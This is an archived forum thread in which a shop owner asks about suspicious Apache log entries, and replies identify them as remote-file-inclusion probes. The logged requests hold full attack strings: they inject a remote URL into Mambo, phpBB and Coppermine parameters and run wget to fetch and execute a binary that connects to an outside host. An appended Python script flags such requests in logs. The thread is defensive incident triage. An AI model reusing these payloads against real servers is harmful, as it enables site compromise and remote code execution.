Is this a hacker's attempt on my catalog?


lerningkurv


This turned up in last night's logs.

It's got me a little worried, wondering what Apache returned in the two underlined entries!

 

213.133.109.66 - - [11/Dec/2005:19:58:52 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 296 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:58:54 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 200 13076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:58:55 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:58:56 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:58:57 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo| HTTP/1.1" 200 13076 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:58:58 -0500] "GET /mambo/index.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo| HTTP/1.1" 404 301 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:58:59 -0500] "GET /cvs/index.php?_REQUEST[option]=com_content&_REQUEST[itemid]=1&GLOBALS=&mosConfig_absolute_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo| HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:59:00 -0500] "GET /admin_styles.phpadmin_styles.php?phpbb_root_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 318 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:59:02 -0500] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 339 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:59:03 -0500] "GET /Forums/admin_styles.phpadmin_styles.php?phpbb_root_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 325 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:59:04 -0500] "GET /forum/admin_styles.phpadmin_styles.php?phpbb_root_path=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo%20YYY;echo| HTTP/1.1" 404 324 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

213.133.109.66 - - [11/Dec/2005:19:59:05 -0500] "GET /modules/coppermine/themes/default/theme.phptheme.php?THEME_DIR=http://213.201.80.13/cm?&cmd=cd%20/tmp;wget%20213.201.80.13/cb;chmod%20744%20cb;./cb%20217.45.15.3%208080;echo| HTTP/1.1" 404 338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"


Looks like a scanner.

I get those all the time: people looking for security holes and unpatched software.

To be safe, you should ban the IP via htaccess.

If the IP is from a country you do not service, ban the entire IP block.


It is an active exploit, some sort of worm maybe - it is downloading a file called 'cb', which is a Unix executable that then connects to another server (possibly DOS). Anyway, check /tmp for a file called cb (or ask your hosting provider to do it if you can't).

.shin
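
The check the original poster is asking about (which of these requests did Apache answer with a page?), as an added example that is not part of any post in this thread: a Python triage of combined-format access-log lines that flags query parameters carrying a remote URL, as `mosConfig_absolute_path`, `phpbb_root_path` and `THEME_DIR` do in the log above. The sample lines are constructed, with documentation-range addresses, and `triage` and `answered` are names chosen for this example.

```python
import re
from urllib.parse import unquote

# Apache combined log: host ident user [time] "request" status bytes ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>.*) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)')
# Query parameter whose value is a remote URL (remote-include probe).
REMOTE_RE = re.compile(r'[?&]([\w\[\]]+)=((?:https?|ftp)://[^&\s]*)', re.I)
# Download/permission tooling inside a cmd= parameter.
SHELL_RE = re.compile(r'[?&]cmd=[^&]*\b(?:wget|curl|chmod)\b', re.I)

# Constructed sample lines in the shape of the thread's entries;
# all addresses are documentation ranges, not the ones from the post.
SAMPLE_LOG = '''\
192.0.2.66 - - [11/Dec/2005:19:58:52 -0500] "GET /index2.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://198.51.100.13/cm?&cmd=cd%20/tmp;wget%20198.51.100.13/cb;chmod%20744%20cb;echo| HTTP/1.1" 404 296 "-" "Mozilla/4.0"
192.0.2.66 - - [11/Dec/2005:19:58:54 -0500] "GET /index.php?_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://198.51.100.13/cm?&cmd=cd%20/tmp;wget%20198.51.100.13/cb;chmod%20744%20cb;echo| HTTP/1.1" 200 13076 "-" "Mozilla/4.0"
192.0.2.66 - - [11/Dec/2005:19:59:04 -0500] "GET /forum/admin_styles.php?phpbb_root_path=http://198.51.100.13/cm?&cmd=cd%20/tmp;wget%20198.51.100.13/cb;echo| HTTP/1.1" 404 324 "-" "Mozilla/4.0"
198.51.100.20 - - [11/Dec/2005:20:01:10 -0500] "GET /product_info.php?products_id=12 HTTP/1.1" 200 9051 "-" "Mozilla/4.0"
'''

def triage(log_text):
    """Return one finding per request carrying a remote-URL parameter."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        target = unquote(m['target'])  # decode %20 etc. before matching
        remote = REMOTE_RE.search(target)
        if not remote:
            continue
        findings.append({
            'ip': m['ip'],
            'path': target.split('?', 1)[0],
            'param': remote.group(1),
            'remote_url': remote.group(2),
            'shell_cmd': bool(SHELL_RE.search(target)),
            'status': int(m['status']),
            'size': m['size'],
        })
    return findings

def answered(findings):
    """Probes the server answered with 2xx. A 200 only shows the script
    exists and returned a page; these are the entries to examine first."""
    return [f for f in findings if 200 <= f['status'] < 300]

if __name__ == '__main__':
    for f in triage(SAMPLE_LOG):
        print(f['status'], f['size'], f['path'], f['param'], f['shell_cmd'])
```

A 404 on a probed path means the targeted script is not installed at that location. A 2xx entry calls for checking whether that script actually uses the named parameter and, as the reply above says, whether a file called `cb` exists in `/tmp`.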


Archived

This topic is now archived and is closed to further replies.
